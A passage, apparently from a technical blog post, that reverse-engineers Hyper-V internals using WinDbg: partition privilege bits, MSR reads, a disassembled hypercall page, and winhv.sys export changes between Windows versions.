<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for a virtual guest idle state is available</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Windows 10 x86 as guest in Windows Server 2016 TP2 privileges in EBX were extended</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EBX = 003880B0 (1110001000000010110000)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 7:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 15: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 19: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 20: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 21: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Unknown privileges is not mentioned in TLFS 4.0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor privileges section, which carried out the operation that caused the VM exit, can be obtained by calculating the value of gs: 0, read the value of the field in the VMCS HOST_GS_BASE or IA32_GS_BASE MSR:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>rdmsr 0xc0000101 </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">msr[c0000101] = fffff800`05464000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then get the value pointed to gs: 82e8, and go to the offset 0xd8.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc poi(fffff800`05464000+82e8)+0xd8</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`04dd70d8 </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00001fff 000039ff</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 ffffe800 .....9..........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`04dd70e8 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this case, the VM exit was made from root-partition.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor in each section forms a special page to run hypercall. Its address can be obtained by reading MSR 0x40000001 (HV_X64_MSR_HYPERCALL):</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="335"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 7 x86 on Windows Server 2012:</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 8 x86 on Windows Server 2016 TP2:</span></div>
</td></tr>
<tr style="height: 81px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> rdmsr 0x40000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">msr[40000001] = 00000000`1ffb1001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc 00000000`1ffb1001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1ffb1000 c3c1010f 90909090 90909090 90909090 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1ffb1010 90909090 90909090 90909090 90909090 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, 0xc3c1010f - instructs opcodes to vmcall; ret</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> rdmsr 0x40000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">msr[40000001] = 00000000`00004001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc 4000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4000 c3c1010f 11b8c88b 0f000000 48c3c101 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4010 c748c18b 000011c1 c1010f00 b8c88bc3 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4020 00000012 c3c1010f 48c18b48 0012c1c7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4030 010f0000 9090c3c1 90909090 90909090 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> up 4000 L50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004000 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004003 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004004 8bc8 mov ecx,eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004006 b811000000 mov eax,11h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000400b 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000400e c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000400f 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004010 8bc1 mov eax,ecx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004012 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004013 c7c111000000 mov ecx,11h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004019 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000401c c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000401d 8bc8 mov ecx,eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000401f b812000000 mov eax,12h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004024 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004027 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004028 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004029 8bc1 mov eax,ecx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000402b 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000402c c7c112000000 mov ecx,12h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004032 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004035 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004036 90 nop</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2012 following changes took place in the export of the driver winhv.sys in comparison with the Windows Server 2008 R2:</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="319"></col><col width="319"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Added</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Removed</span></div>
</td></tr>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAddLogicalProcessor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAttachDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDetachDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorProperty</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorRegisters</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetNextQueuedPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSystemInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInjectSyntheticMachineCheckEvent</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapDeviceInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPrepareForSleep </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorIndexToLpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorNumberToVpIndex</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRemoveLogicalProcessor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorRegisters</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapDeviceInterrupt</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvOnInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReclaimInterruptVector</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSupplyInterruptVector </span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Export Winhv.sys in client versions of Windows (as you see – many function were removed from Windows 10 winhv.sys):</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="219"></col><col width="256"></col><col width="187"></col></colgroup><tbody>
<tr style="height: 17px;"><td colspan="2" style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 8.1 x86</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 10 x86</span></div>
</td></tr>
<tr style="height: 647px;"><td style="border-color: rgb(0, 0, 0); border-style: solid; border-width: 1px 0px 1px 1px; padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAddLogicalProcessor </span></div>
